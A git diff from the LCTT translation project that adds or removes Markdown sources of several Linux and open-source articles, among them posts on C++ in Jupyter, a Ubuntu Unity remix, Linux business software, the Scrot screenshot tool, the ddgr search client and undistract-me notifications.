-![](https://cdn-images-1.medium.com/max/1600/1*Igegq0xBebuJV8hy0TGpfg.png) -Live help for the C++standard library in the Jupyter notebook - -> We realized that we started using the C++ kernel ourselves very early in the development of the project. For quick experimentation, or reproducing bugs. No need to set up a project with a cpp file and complicated project settings for finding the dependencies… Just write some code and hit Shift+Enter. - -Visual output can also be displayed using the rich display mechanism of the Jupyter protocol. - - - -![](https://cdn-images-1.medium.com/max/1600/1*t_9qAXtdkSXr-0tO9VvOzQ.png) -Using Jupyter's rich display mechanism to display an image inline in the notebook - - -![](https://cdn-images-1.medium.com/max/1200/1*OVfmXFAbfjUtGFXYS9fKRA.png) - -Another important feature of the Jupyter ecosystem are the [Jupyter Interactive Widgets][22]. They allow the user to build graphical interfaces and interactive data visualization inline in the Jupyter notebook. Moreover it is not just a collection of widgets, but a framework that can be built upon, to create arbitrary visual components. Popular interactive widget libraries include - -* [bqplot][1] (2-D plotting with d3.js) - -* [pythreejs][2] (3-D scene visualization with three.js) - -* [ipyleaflet][3] (maps visualization with leaflet.js) - -* [ipyvolume][4] (3-D plotting and volume rendering with three.js) - -* [nglview][5] (molecular visualization) - -Just like the rest of the Jupyter ecosystem, Jupyter interactive widgets were designed as a language-agnostic framework. Other language back-ends can be created reusing the front-end component, which can be installed separately. - -[xwidgets][23], which is still at an early stage of development, is a native C++ implementation of the Jupyter widgets protocol. It already provides an implementation for most of the widget types available in the core Jupyter widgets package. - - - -![](https://cdn-images-1.medium.com/max/1600/1*ro5Ggdstnf0DoqhTUWGq3A.gif) -C++ back-end to the Jupyter interactive widgets - -Just like with ipywidgets, one can build upon xwidgets and implement C++ back-ends for the Jupyter widget libraries listed earlier, effectively enabling them for the C++ programming language and other xeus-based kernels: xplot, xvolume, xthreejs… - - - -![](https://cdn-images-1.medium.com/max/1200/1*yCRYoJFnbtxYkYMRc9AioA.png) - -[xplot][24] is an experimental C++ back-end for the [bqplot][25] 2-D plotting library. It enables an API following the constructs of the  [_Grammar of Graphics_][26]  in C++. - -In xplot, every item in a chart is a separate object that can be modified from the back-end,  _dynamically_ . - -Changing a property of a plot item, a scale, an axis or the figure canvas itself results in the communication of an update message to the front-end, which reflects the new state of the widget visually. - - - -![](https://cdn-images-1.medium.com/max/1600/1*Mx2g3JuTG1Cfvkkv0kqtLA.gif) -Changing the data of a scatter plot dynamically to update the chart - -> Warning: the xplot and xwidgets projects are still at an early stage of development and are changing drastically at each release. - -Interactive computing environments like Jupyter are not the only missing tool in the C++ world. Two key ingredients to the success of Python as the  _lingua franca_  of data science is the existence of libraries like [NumPy][27] and [Pandas][28] at the foundation of the ecosystem. - - - -![](https://cdn-images-1.medium.com/max/1200/1*HsU43Jzp1vJZpX2g8XPJsg.png) - -[xtensor][29] is a C++ library meant for numerical analysis with multi-dimensional array expressions. - -xtensor provides - -* an extensible expression system enabling lazy NumPy-style broadcasting. - -* an API following the  _idioms_  of the C++ standard library. - -* tools to manipulate array expressions and build upon xtensor. - -xtensor exposes an API similar to that of NumPy covering a growing portion of the functionalities. A cheat sheet can be [found in the documentation][30]: - - - -![](https://cdn-images-1.medium.com/max/1600/1*PBrf5vWYC8VTq_7VUOZCpA.gif) -Scrolling the NumPy to xtensor cheat sheet - -However, xtensor internals are very different from NumPy. Using modern C++ techniques (template expressions, closure semantics) xtensor is a lazily evaluated library, avoiding the creation of temporary variables and unnecessary memory allocations, even in the case complex expressions involving broadcasting and language bindings. - -Still, from a user perspective, the combination of xtensor with the C++ notebook provides an experience very similar to that of NumPy in a Python notebook. - - - -![](https://cdn-images-1.medium.com/max/1600/1*ULFpg-ePkdUbqqDLJ9VrDw.png) -Using the xtensor array expression library in a C++ notebook - -In addition to the core library, the xtensor ecosystem has a number of other components - -* [xtensor-blas][6]: the counterpart to the numpy.linalg module. - -* [xtensor-fftw][7]: bindings to the [fftw][8] library. - -* [xtensor-io][9]: APIs to read and write various file formats (images, audio, NumPy's NPZ format). - -* [xtensor-ros][10]: bindings for ROS, the robot operating system. - -* [xtensor-python][11]: bindings for the Python programming language, allowing the use of NumPy arrays in-place, using the NumPy C API and the pybind11 library. - -* [xtensor-julia][12]: bindings for the Julia programming language, allowing the use of Julia arrays in-place, using the C API of the Julia interpreter, and the CxxWrap library. - -* [xtensor-r][13]: bindings for the R programming language, allowing the use of R arrays in-place. - -Detailing further the features of the xtensor framework would be beyond the scope of this post. - -If you are interested in trying the various notebooks presented in this post, there is no need to install anything. You can just use  _binder_ : - -![](https://cdn-images-1.medium.com/max/1200/1*9cy5Mns_I0eScsmDBjvxDQ.png) - -[The Binder project][31], which is part of Project Jupyter, enables the deployment of containerized Jupyter notebooks, from a GitHub repository together with a manifest listing the dependencies (as conda packages). - -All the notebooks in the screenshots above can be run online, by just clicking on one of the following links: - -[xtensor][32]: the C++ N-D array expression library in a C++ notebook - -[xwidgets][33]: the C++ back-end for Jupyter interactive widgets - -[xplot][34]: the C++ back-end to the bqplot 2-D plotting library for Jupyter. - - - -![](https://cdn-images-1.medium.com/max/1200/1*JwqhpMxMJppEepj7U4fV-g.png) - -[JupyterHub][35] is the multi-user infrastructure underlying open wide deployments of Jupyter like Binder but also smaller deployments for authenticated users. - -The modular architecture of JupyterHub enables a great variety of scenarios on how users are authenticated, and what service is made available to them. JupyterHub deployment for several hundreds of users have been done in various universities and institutions, including the Paris-Sud University, where the C++ kernel was also installed for the students to use. - -> In September 2017, the 350 first-year students at Paris-Sud University who took the “[Info 111: Introduction to Computer ->  Science][36]” class wrote their first lines of C++ in a Jupyter notebook. - -The use of Jupyter notebooks in the context of teaching C++ proved especially useful for the first classes, where students can focus on the syntax of the language without distractions such as compiling and linking. - -### Acknowledgements - -The software presented in this post was built upon the work of a large number of people including the Jupyter team and the Cling developers. - -We are especially grateful to [Patrick Bos ][37](who authored xtensor-fftw), Nicolas Thiéry, Min Ragan Kelley, Thomas Kluyver, Yuvi Panda, Kyle Cranmer, Axel Naumann and Vassil Vassilev. - -We thank the [DIANA/HEP][38] organization for supporting travel to CERN and encouraging the collaboration between Project Jupyter and the ROOT team. - -We are also grateful to the team at Paris-Sud University who worked on the JupyterHub deployment and the class materials, notably [Viviane Pons][39]. - -The development of xeus, xtensor, xwidgets and related packages at [QuantStack][40] is sponsored by [Bloomberg][41]. - -### About the authors (alphabetical order) - - [_Sylvain Corlay_][42] _, _ Scientific Software Developer at [QuantStack][43] - - [_Loic Gouarin_][44] _, _ Research Engineer at [Laboratoire de Mathématiques at Orsay][45] - - [_Johan Mabille_][46] _, _ Scientific Software Developer at [QuantStack][47] - - [_Wolf Vollprecht_][48] , Scientific Software Developer at [QuantStack][49] - -Thanks to [Maarten Breddels][50], [Wolf Vollprecht][51], [Brian E. Granger][52], and [Patrick Bos][53]. - --------------------------------------------------------------------------------- - -via: https://blog.jupyter.org/interactive-workflows-for-c-with-jupyter-fe9b54227d92 - -作者:[QuantStack ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.jupyter.org/@QuantStack?source=post_header_lockup -[1]:https://github.com/bloomberg/bqplot -[2]:https://github.com/jovyan/pythreejs -[3]:https://github.com/ellisonbg/ipyleaflet -[4]:https://github.com/maartenbreddels/ipyvolume -[5]:https://github.com/arose/nglview -[6]:https://github.com/QuantStack/xtensor-blas -[7]:https://github.com/egpbos/xtensor-fftw -[8]:http://www.fftw.org/ -[9]:https://github.com/QuantStack/xtensor-io -[10]:https://github.com/wolfv/xtensor_ros -[11]:https://github.com/QuantStack/xtensor-python -[12]:https://github.com/QuantStack/Xtensor.jl -[13]:https://github.com/QuantStack/xtensor-r -[14]:https://github.com/jupyter/jupyter/wiki/Jupyter-kernels -[15]:https://github.com/ipython/ipykernel -[16]:https://github.com/JuliaLang/IJulia.jl -[17]:https://github.com/QuantStack/xeus -[18]:https://root.cern.ch/cling -[19]:https://root.cern.ch/ -[20]:https://github.com/QuantStack/xeus-cling -[21]:http://en.cppreference.com/w/ -[22]:http://jupyter.org/widgets -[23]:https://github.com/QUantStack/xwidgets -[24]:https://github.com/QuantStack/xplot -[25]:https://github.com/bloomberg/bqplot -[26]:https://dl.acm.org/citation.cfm?id=1088896 -[27]:http://www.numpy.org/ -[28]:https://pandas.pydata.org/ -[29]:https://github.com/QuantStack/xtensor/ -[30]:http://xtensor.readthedocs.io/en/latest/numpy.html -[31]:https://mybinder.org/ -[32]:https://beta.mybinder.org/v2/gh/QuantStack/xtensor/0.14.0-binder2?filepath=notebooks/xtensor.ipynb -[33]:https://beta.mybinder.org/v2/gh/QuantStack/xwidgets/0.6.0-binder?filepath=notebooks/xwidgets.ipynb -[34]:https://beta.mybinder.org/v2/gh/QuantStack/xplot/0.3.0-binder?filepath=notebooks -[35]:https://github.com/jupyterhub/jupyterhub -[36]:http://nicolas.thiery.name/Enseignement/Info111/ -[37]:https://twitter.com/egpbos -[38]:http://diana-hep.org/ -[39]:https://twitter.com/pyviv -[40]:https://twitter.com/QuantStack -[41]:http://www.techatbloomberg.com/ -[42]:https://twitter.com/SylvainCorlay -[43]:https://github.com/QuantStack/ -[44]:https://twitter.com/lgouarin -[45]:https://www.math.u-psud.fr/ -[46]:https://twitter.com/johanmabille?lang=en -[47]:https://github.com/QuantStack/ -[48]:https://twitter.com/wuoulf -[49]:https://github.com/QuantStack/ -[50]:https://medium.com/@maartenbreddels?source=post_page -[51]:https://medium.com/@wolfv?source=post_page -[52]:https://medium.com/@ellisonbg?source=post_page -[53]:https://medium.com/@egpbos?source=post_page diff --git a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md b/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md deleted file mode 100644 index 0e38373c3f..0000000000 --- a/sources/tech/20171129 Someone Tries to Bring Back Ubuntus Unity from the Dead as an Official Spin.md +++ /dev/null @@ -1,41 +0,0 @@ -Someone Tries to Bring Back Ubuntu's Unity from the Dead as an Official Spin -============================================================ - - - -> The Ubuntu Unity remix would be supported for nine months - -Canonical's sudden decision of killing its Unity user interface after seven years affected many Ubuntu users, and it looks like someone now tries to bring it back from the dead as an unofficial spin. - -Long-time [Ubuntu][1] member Dale Beaudoin [ran a poll][2] last week on the official Ubuntu forums to take the pulse of the community and see if they are interested in an Ubuntu Unity Remix that would be released alongside Ubuntu 18.04 LTS (Bionic Beaver) next year and be supported for nine months or five years. - -Thirty people voted in the poll, with 67 percent of them opting for an LTS (Long Term Support) release of the so-called Ubuntu Unity Remix, while 33 percent voted for the 9-month supported release. It also looks like this upcoming Ubuntu Unity Spin [looks to become an official flavor][3], yet this means commitment from those developing it. - -"A recent poll voted 2/3rds in favor of Ubuntu Unity to become an LTS distribution. We should try to work this cycle assuming that it will be LTS and an official flavor," said Dale Beaudoin. "We will try and release an updated ISO once every week or 10 days using the current 18.04 daily builds of default Ubuntu Bionic Beaver as a platform." - -### Is Ubuntu Unity making a comeback? - -The last Ubuntu version to ship with Unity by default was Ubuntu 17.04 (Zesty Zapus), which will reach end of life on January 2018\. Ubuntu 17.10 (Artful Artful), the current stable release of the popular operating system, is the first to use the GNOME desktop environment by default for the main Desktop edition as Canonical CEO [announced][4] earlier this year that Unity would no longer be developed. - -However, Canonical is still offering the Unity desktop environment from the official software repositories, so if someone wants to install it, it's one click away. But the bad news is that they'll be supported up until the release of Ubuntu 18.04 LTS (Bionic Beaver) in April 2018, so the developers of the Ubuntu Unity Remix would have to continue to keep in on life support on their a separate repository. - -On the other hand, we don't believe Canonical will change their mind and accept this Ubuntu Unity Spin to become an official flavor, which would mean they failed to continue development of Unity, and now a handful of people can do it. Most probably, if interest in this Ubuntu Unity Remix won't fade away soon, it will be an unofficial spin supported by the nostalgic community. - -Question is, would you be interested in an Ubuntu Unity spin, official or not? - --------------------------------------------------------------------------------- - -via: http://news.softpedia.com/news/someone-tries-to-bring-back-ubuntu-s-unity-from-the-dead-as-an-unofficial-spin-518778.shtml - -作者:[Marius Nestor ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://news.softpedia.com/editors/browse/marius-nestor -[1]:http://linux.softpedia.com/downloadTag/Ubuntu -[2]:https://community.ubuntu.com/t/poll-unity-7-distro-9-month-spin-or-lts-for-18-04/2066 -[3]:https://community.ubuntu.com/t/unity-maintenance-roadmap/2223 -[4]:http://news.softpedia.com/news/canonical-to-stop-developing-unity-8-ubuntu-18-04-lts-ships-with-gnome-desktop-514604.shtml -[5]:http://news.softpedia.com/editors/browse/marius-nestor diff --git a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md deleted file mode 100644 index 195b51423a..0000000000 --- a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md +++ /dev/null @@ -1,116 +0,0 @@ -Yoliver istranslating. -Excellent Business Software Alternatives For Linux -------- - -Many business owners choose to use Linux as the operating system for their operations for a variety of reasons. - -1. Firstly, they don't have to pay anything for the privilege, and that is a massive bonus during the early stages of a company where money is tight. - -2. Secondly, Linux is a light alternative compared to Windows and other popular operating systems available today. - -Of course, lots of entrepreneurs worry they won't have access to some of the essential software packages if they make that move. However, as you will discover throughout this post, there are plenty of similar tools that will cover all the bases. - - [![](https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s400/4444061098_6eeaa7dc1a_z.jpg)][3] - -### Alternatives to Microsoft Word - -All company bosses will require access to a word processing tool if they want to ensure the smooth running of their operation according to - -[the latest article from Fareed Siddiqui][4] - -. You'll need that software to write business plans, letters, and many other jobs within your firm. Thankfully, there are a variety of alternatives you might like to select if you opt for the Linux operating system. Some of the most popular ones include: - -* LibreOffice Writer - -* AbiWord - -* KWord - -* LaTeX - -So, you just need to read some online reviews and then download the best word processor based on your findings. Of course, if you're not satisfied with the solution, you should take a look at some of the other ones on that list. In many instances, any of the programs mentioned above should work well. - -### Alternatives to Microsoft Excel - - [![](https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s400/28929069495_e85d2626ba_z.jpg)][5] - -You need a spreadsheet tool if you want to ensure your business doesn't get into trouble when it comes to bookkeeping and inventory control. There are specialist software packages on the market for both of those tasks, but - -[open-source alternatives][6] - -to Microsoft Excel will give you the most amount of freedom when creating your spreadsheets and editing them. While there are other packages out there, some of the best ones for Linux users include: - -* [LibreOffice Calc][1] - -* KSpread - -* Gnumeric - -Those programs work in much the same way as Microsoft Excel, and so you can use them for issues like accounting and stock control. You might also use that software to monitor employee earnings or punctuality. The possibilities are endless and only limited by your imagination. - -### Alternatives to Adobe Photoshop - - [![](https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s400/32206185926_c69accfcef_z.jpg)][7] - -Company bosses require access to design programs when developing their marketing materials and creating graphics for their websites. You might also use software of that nature to come up with a new business logo at some point. Lots of entrepreneurs spend a fortune on - -[Training Connections Photoshop classes][8] - -and those available from other providers. They do that in the hope of educating their teams and getting the best results. However, people who use Linux can still benefit from that expertise if they select one of the following - -[alternatives][9] - -: - -* GIMP - -* Krita - -* Pixel - -* LightZone - -The last two suggestions on that list require a substantial investment. Still, they function in much the same way as Adobe Photoshop, and so you should manage to achieve the same quality of work. - -### Other software solutions that you'll want to consider - -Alongside those alternatives to some of the most widely-used software packages around today, business owners should take a look at the full range of products they could use with the Linux operating system. Here are some tools you might like to research and consider: - -* Inkscape - similar to Coreldraw - -* LibreOffice Base - similar to Microsoft Access - -* LibreOffice Impress - similar to Microsoft PowerPoint - -* File Roller - siThis is a contributed postmilar to WinZip - -* Linphone - similar to Skype - -There are - -[lots of other programs][10] - - you'll also want to research, and so the best solution is to use the internet to learn more. You will find lots of reviews from people who've used the software in the past, and many of them will compare the tool to its Windows or iOS alternative. So, you shouldn't have to work too hard to identify the best ones and sort the wheat from the chaff. - -Now you have all the right information; it's time to weigh all the pros and cons of Linux and work out if it's suitable for your operation. In most instances, that operating system does not place any limits on your business activities. It's just that you need to use different software compared to some of your competitors. People who use Linux tend to benefit from improved security, speed, and performance. Also, the solution gets regular updates, and so it's growing every single day. Unlike Windows and other solutions; you can customize Linux to meet your requirements. With that in mind, do not make the mistake of overlooking this fantastic system! - --------------------------------------------------------------------------------- - -via: http://linuxblog.darkduck.com/2017/11/excellent-business-software.html - -作者:[DarkDuck][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxblog.darkduck.com/ -[1]:http://linuxblog.darkduck.com/2015/08/pivot-tables-in-libreoffice-calc.html -[3]:https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s1600/4444061098_6eeaa7dc1a_z.jpg -[4]:https://www.linkedin.com/pulse/benefits-using-microsoft-word-fareed/ -[5]:https://4.bp.blogspot.com/-XdS6bSLQbOU/WhxyeWZeeCI/AAAAAAAADhc/C3hGY6rgzX4m2emunot80-4URu9-aQx8wCLcBGAs/s1600/28929069495_e85d2626ba_z.jpg -[6]:http://linuxblog.darkduck.com/2014/03/why-open-software-and-what-are-benefits.html -[7]:https://3.bp.blogspot.com/-Id9Dm3CIXmc/WhxzGIlv3zI/AAAAAAAADho/VfIRCAbJMjMZzG2M97-uqLV9mOhqN7IWACLcBGAs/s1600/32206185926_c69accfcef_z.jpg -[8]:https://www.trainingconnection.com/photoshop-training.php -[9]:http://linuxblog.darkduck.com/2011/10/photoshop-alternatives-for-linux.html -[10]:http://www.makeuseof.com/tag/best-linux-software/ diff --git a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md b/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md deleted file mode 100644 index 2b4d2248b2..0000000000 --- a/sources/tech/20171130 Scrot Linux command-line screen grabs made simple.md +++ /dev/null @@ -1,108 +0,0 @@ -Scrot: Linux command-line screen grabs made simple -============================================================ - -### Scrot is a basic, flexible tool that offers a number of handy options for taking screen captures from the Linux command line. - -![Scrot: Screen grabs made simple](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/community-penguins-osdc-lead.png?itok=BmqsAF4A "Scrot: Screen grabs made simple") -Image credits : Original photo by Rikki Endsley. [CC BY-SA 4.0][13] - -There are great tools on the Linux desktop for taking screen captures, such as [KSnapshot][14] and [Shutter][15]. Even the simple utility that comes with the GNOME desktop does a pretty good job of capturing screens. But what if you rarely need to take screen captures? Or you use a Linux distribution without a built-in capture tool, or an older computer with limited resources? - -Turn to the command line and a little utility called [Scrot][16]. It does a fine job of taking simple screen captures, and it includes a few features that might surprise you. - -### Getting started with Scrot - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -Many Linux distributions come with Scrot already installed—to check, type `which scrot`. If it isn't there, you can install Scrot using your distro's package manager. If you're willing to compile the code, grab it [from GitHub][22]. - -To take a screen capture, crack open a terminal window and type `scrot [filename]`, where `[filename]` is the name of file to which you want to save the image (for example, `desktop.png`). If you don't include a name for the file, Scrot will create one for you, such as `2017-09-24-185009_1687x938_scrot.png`. (That filename isn't as descriptive it could be, is it? That's why it's better to add one to the command.) - -Running Scrot with no options takes a screen capture of your entire desktop. If you don't want to do that, Scrot lets you focus on smaller portions of your screen. - -### Taking a screen capture of a single window - -Tell Scrot to take a screen capture of a single window by typing `scrot -u [filename]`. - -The `-u` option tells Scrot to grab the window currently in focus. That's usually the terminal window you're working in, which might not be the one you want. - -To grab another window on your desktop, type `scrot -s [filename]`. - -The `-s` option lets you do one of two things: - -* select an open window, or - -* draw a rectangle around a window or a portion of a window to capture it. - -You can also set a delay, which gives you a little more time to select the window you want to capture. To do that, type `scrot -u -d [num] [filename]`. - -The `-d` option tells Scrot to wait before grabbing the window, and `[num]` is the number of seconds to wait. Specifying `-d 5` (wait five seconds) should give you enough time to choose a window. - -### More useful options - -Scrot offers a number of additional features (most of which I never use). The ones I find most useful include: - -* `-b` also grabs the window's border - -* `-t` grabs a window and creates a thumbnail of it. This can be useful when you're posting screen captures online. - -* `-c` creates a countdown in your terminal when you use the `-d` option. - -To learn about Scrot's other options, check out the its documentation by typing `man scrot` in a terminal window, or [read it online][17]. Then start snapping images of your screen. - -It's basic, but Scrot gets the job done nicely. - -### Topics - - [Linux][23] - -### About the author - - [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] - - Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][7], [Mastodon][8], [GitHub][9], and... [more about Scott Nesbitt][10][More about me][11] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot - -作者:[ Scott Nesbitt  ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot?rate=H43kUdawjR0GV9D0dCbpnmOWcqw1WekfrAI_qKo8UwI -[7]:http://www.twitter.com/ScottWNesbitt -[8]:https://mastodon.social/@scottnesbitt -[9]:https://github.com/ScottWNesbitt -[10]:https://opensource.com/users/scottnesbitt -[11]:https://opensource.com/users/scottnesbitt -[12]:https://opensource.com/user/14925/feed -[13]:https://creativecommons.org/licenses/by-sa/4.0/ -[14]:https://www.kde.org/applications/graphics/ksnapshot/ -[15]:https://launchpad.net/shutter -[16]:https://github.com/dreamer/scrot -[17]:http://manpages.ubuntu.com/manpages/precise/man1/scrot.1.html -[18]:https://opensource.com/users/scottnesbitt -[19]:https://opensource.com/users/scottnesbitt -[20]:https://opensource.com/users/scottnesbitt -[21]:https://opensource.com/article/17/11/taking-screen-captures-linux-command-line-scrot#comments -[22]:https://github.com/dreamer/scrot -[23]:https://opensource.com/tags/linux diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md new file mode 100644 index 0000000000..ee451a6172 --- /dev/null +++ b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -0,0 +1,103 @@ +translating---geekpi + +# Search DuckDuckGo from the Command Line + + ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) +When we showed you how to [search Google from the command line][3] a lot of you to say you use [Duck Duck Go][4], the awesome privacy-focused search engine. + +Well, now there’s a tool to search DuckDuckGo from the command line. It’s called [ddgr][6] (pronounced, in my head, as  _dodger_ ) and it’s pretty neat. + +Like [Googler][7], ddgr is totally open-source and totally unofficial. Yup, the app is unaffiliated with DuckDuckGo in any way. So, should it start returning unsavoury search results for innocent terms, make sure you quack in this dev’s direction, and not the search engine’s! + +### DuckDuckGo Terminal App + +![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) + +[DuckDuckGo Bangs][8] makes finding stuff on DuckDuckGo super easy (there’s even a bang for  _this_  site) and, dutifully, ddgr supports them. + +Unlike the web interface, you can specify the number of search results you would like to see per page. It’s more convenient than skimming through 30-odd search results per page. The default interface is carefully designed to use minimum space without sacrificing readability. + +`ddgr` has a number of features, including: + +* Choose number of search results to fetch + +* Support for Bash autocomplete + +* Use !bangs + +* Open URLs in a browser + +* “I’m feeling lucky” option + +* Filter by time, region, file type, etc + +* Minimal dependencies + +You can download `ddgr` for various systems direct from the Github project page: + +[Download ‘ddgr’ from Github][9] + +You can also install ddgr on Ubuntu 16.04 LTS and up from a PPA. This repo is maintained by the developer of ddgr and is recommended should you want to stay up-to-date with new releases as and when they appear. + +Do note that at the time of writing the latest version of ddgr is  _not_  in the PPA, but an older version (lacking –num support) is: + +``` +sudo add-apt-repository ppa:twodopeshaggy/jarun +``` + +``` +sudo apt-get update +``` + +### How To Use ddgr to Search DuckDuckGo from the Comand Line + +To use ddgr once you installed all you need to do is pop open your terminal emulator of choice and run: + +``` +ddgr +``` + +Next enter a search term: + +``` +search-term +``` + +To limit the number of results returned run: + +``` +ddgr --num 5 search-term +``` + +To instantly open the first matching result for a search term in your browser run: + +``` +ddgr -j search-term +``` + +You can pass arguments and flags to narrow down your search. To see a comprehensive list inside the terminal run: + +``` +ddgr -h +``` + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app + +作者:[JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/download +[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line +[4]:http://duckduckgo.com/ +[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app +[6]:https://github.com/jarun/ddgr +[7]:https://github.com/jarun/googler +[8]:https://duckduckgo.com/bang +[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 diff --git a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md b/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md deleted file mode 100644 index 46afe9b893..0000000000 --- a/sources/tech/20171130 Undistract-me : Get Notification When Long Running Terminal Commands Complete.md +++ /dev/null @@ -1,156 +0,0 @@ -translating---geekpi - -Undistract-me : Get Notification When Long Running Terminal Commands Complete -============================================================ - -by [sk][2] · November 30, 2017 - -![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) - -A while ago, we published how to [get notification when a Terminal activity is done][3]. Today, I found out a similar utility called “undistract-me” that notifies you when long running terminal commands complete. Picture this scenario. You run a command that takes a while to finish. In the mean time, you check your facebook and get so involved in it. After a while, you remembered that you ran a command few minutes ago. You go back to the Terminal and notice that the command has already finished. But you have no idea when the command is completed. Have you ever been in this situation? I bet most of you were in this situation many times. This is where “undistract-me” comes in help. You don’t need to constantly check the terminal to see if a command is completed or not. Undistract-me utility will notify you when a long running command is completed. It will work on Arch Linux, Debian, Ubuntu and other Ubuntu-derivatives. - -#### Installing Undistract-me - -Undistract-me is available in the default repositories of Debian and its variants such as Ubuntu. All you have to do is to run the following command to install it. - -``` -sudo apt-get install undistract-me -``` - -The Arch Linux users can install it from AUR using any helper programs. - -Using [Pacaur][4]: - -``` -pacaur -S undistract-me-git -``` - -Using [Packer][5]: - -``` -packer -S undistract-me-git -``` - -Using [Yaourt][6]: - -``` -yaourt -S undistract-me-git -``` - -Then, run the following command to add “undistract-me” to your Bash. - -``` -echo 'source /etc/profile.d/undistract-me.sh' >> ~/.bashrc -``` - -Alternatively you can run this command to add it to your Bash: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .bashrc -``` - -If you are in Zsh shell, run this command: - -``` -echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc -``` - -Finally update the changes: - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -#### Configure Undistract-me - -By default, Undistract-me will consider any command that takes more than 10 seconds to complete as a long-running command. You can change this time interval by editing /usr/share/undistract-me/long-running.bash file. - -``` -sudo nano /usr/share/undistract-me/long-running.bash -``` - -Find “LONG_RUNNING_COMMAND_TIMEOUT” variable and change the default value (10 seconds) to something else of your choice. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] - -Save and close the file. Do not forget to update the changes: - -``` -source ~/.bashrc -``` - -Also, you can disable notifications for particular commands. To do so, find the “LONG_RUNNING_IGNORE_LIST” variable and add the commands space-separated like below. - -By default, the notification will only show if the active window is not the window the command is running in. That means, it will notify you only if the command is running in the background Terminal window. If the command is running in active window Terminal, you will not be notified. If you want undistract-me to send notifications either the Terminal window is visible or in the background, you can set IGNORE_WINDOW_CHECK to 1 to skip the window check. - -The other cool feature of Undistract-me is you can set audio notification along with visual notification when a command is done. By default, it 